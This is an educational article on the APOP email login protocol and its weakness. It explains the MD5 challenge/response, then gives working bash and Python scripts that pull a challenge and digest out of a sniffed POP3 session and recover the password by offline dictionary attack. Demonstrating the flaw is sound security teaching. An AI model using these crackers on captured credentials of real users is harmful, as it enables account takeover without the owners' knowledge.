APOP Email Protocol - MD5 Challenge/Response

by Ovid

If you've ever spent some time with a packet sniffer (like Ethereal, for example) then you've probably seen some Post Office Protocol (POP) packets that were nabbed by the sniffer.  POP is a very insecure protocol when exposed to packet sniffing.

Under standard usage the username and password are sent in the clear.  A plain POP3 login looks like this on the wire:

USER ovid
+OK
PASS metamorphosis
+OK User logged in

In this case, ovid is the username and metamorphosis is the password, and anyone sniffing the segment now has both.  Not very secure at all.

In an effort to keep passwords off the wire, many ISPs support APOP (Authenticated POP), an optional POP3 command described in RFC 1939.

In APOP the server keeps a copy of your password (it has to be stored in cleartext or some reversible form, which is a liability in itself), so there is no need for the password to be sent across the net.  How does the server authenticate you without you sending your password?  With an MD5 challenge/response.

Here's an APOP authentication from EarthLink's mailserver:

+OK NGPopper VEL_6_10 at earthlink.net ready <1895.1226101394@pop-borzoi.atl.sa.earthlink.net>

APOP ovid@earthlink.net f8d01f709fe922fca4628c19f4435c59

+OK ovid has 1 messages (902 octets).

You'll notice that the user doesn't send his password in the clear, but instead sends an MD5 digest (a hash, not an encrypted copy of the password).

The server (NGPopper in this example) sends a unique challenge, the timestamp in angle brackets, as part of its greeting banner.

In this case the challenge is: <1895.1226101394@pop-borzoi.atl.sa.earthlink.net> (the angle brackets are part of it).

The client then appends the user's password to the challenge, hashes the result with MD5, and sends the 32 hex digits of the digest along with the username.

You can reproduce the digest yourself at a UNIX terminal (printf avoids echo's trailing newline and its non-portable flags):

$ printf '%s' "<1895.1226101394@pop-borzoi.atl.sa.earthlink.net>metamorphosis" | md5sum
f8d01f709fe922fca4628c19f4435c59  -

There's the hash of the challenge concatenated with the password, metamorphosis, and it matches the response the client sent.

The server, which already has the user's password, computes the same digest and verifies that the two match.  Pretty neat, but not really that secure.  The challenge stops precomputed hash tables, but it doesn't stop guessing: each guess costs one MD5 and never touches the server, so if the password is a word found in the dictionary it will fall quickly.

In the example above, Ethereal has captured both the challenge and the response.  So all we need to do is run an offline dictionary attack with the challenge prepended to each candidate word.

Here's a rough bash script called ApopCrack.sh which takes three arguments: a wordlist file, the challenge sent by the server, and the hash sent by the client.

It then runs through all the words, hashing them with the challenge and checking whether it matches the response.  If it gets a hit it echoes the word that matched and exits.

ApopCrack.sh:

#!/bin/bash
# ApopCrack
# $1 is the wordlist file
# $2 is the challenge sent by the server (including the angle brackets)
# $3 is the response (32 hex digits) sent by the client

WordList="$1"
Challenge="$2"
Response="$3"

# md5 -q is the BSD/macOS tool, md5sum the GNU/Linux one; use whichever exists
md5hex() {
  if command -v md5sum >/dev/null 2>&1; then
    printf '%s' "$1" | md5sum | cut -d' ' -f1
  else
    printf '%s' "$1" | md5 -q
  fi
}

# loop through each line in the wordlist file
while IFS= read -r PassWord
do
  # if the md5 hash matches, echo the word that worked and exit
  if [[ "$(md5hex "${Challenge}${PassWord}")" = "$Response" ]]
  then
    echo "$PassWord"
    exit 0
  fi
done < "$WordList"

echo "no match in wordlist" >&2
exit 1
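The same attack in Python, as an added example that is not part of the original article: it pulls the challenge out of the server greeting and the username and digest out of the APOP line the way Ethereal showed them, then runs the dictionary attack against the pair.  The capture is constructed from the greeting and APOP lines quoted above, with the response recomputed from the password metamorphosis so the sample is self-consistent; the wordlist is constructed too, and a real run would read a dictionary file instead.

```python
import hashlib
import re

# Constructed sample built from the exchange quoted in the article.  The
# response is recomputed from the article's password so the capture below
# is consistent whatever the reader's md5 tool prints.
CHALLENGE = "<1895.1226101394@pop-borzoi.atl.sa.earthlink.net>"
USERNAME = "ovid@earthlink.net"
PASSWORD = "metamorphosis"

# RFC 1939: the challenge is the first <...> token in the "+OK" greeting;
# the client answers "APOP name digest", digest = MD5(challenge + password).
GREETING_RE = re.compile(r"^\+OK .*?(<[^<>]+>)")
APOP_RE = re.compile(r"^APOP (\S+) ([0-9a-fA-F]{32})\s*$")


def apop_response(challenge: str, password: str) -> str:
    """Compute the APOP digest exactly as a client does."""
    return hashlib.md5((challenge + password).encode()).hexdigest()


def parse_capture(session: str):
    """Return (user, challenge, response) from a sniffed POP3 session."""
    challenge = user = response = None
    for line in session.splitlines():
        if challenge is None:
            m = GREETING_RE.match(line)
            if m:
                challenge = m.group(1)
                continue
        m = APOP_RE.match(line)
        if m:
            user, response = m.group(1), m.group(2).lower()
    if None in (challenge, user, response):
        raise ValueError("no complete APOP exchange in capture")
    return user, challenge, response


def crack(wordlist, challenge: str, response: str):
    """Offline dictionary attack: one MD5 per guess, never touches the server."""
    for word in wordlist:
        word = word.rstrip("\r\n")          # lines read from a file keep their newline
        if apop_response(challenge, word) == response:
            return word
    return None


# Constructed capture: the article's greeting and APOP lines, CRLF-terminated
# as they appear on the wire.
SESSION = (
    "+OK NGPopper VEL_6_10 at earthlink.net ready " + CHALLENGE + "\r\n"
    "APOP " + USERNAME + " " + apop_response(CHALLENGE, PASSWORD) + "\r\n"
    "+OK ovid has 1 messages (902 octets).\r\n"
)

# Constructed wordlist; point this at /usr/share/dict/words for a real run.
WORDLIST = ["password", "letmein", "kafka", "metamorphosis", "gregor"]

if __name__ == "__main__":
    user, chal, resp = parse_capture(SESSION)
    print(f"user={user} challenge={chal} response={resp}")
    print("cracked:", crack(WORDLIST, chal, resp))
    # compare against the digest the article shows for the same exchange
    print("matches the article's digest:", resp == "f8d01f709fe922fca4628c19f4435c59")
```

Because the whole attack is offline, the server sees nothing: no failed logins, no lockout, no rate limit.  That is the practical difference between sniffing an APOP digest and sniffing a cleartext PASS, and it is why a weak password is not rescued by APOP.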

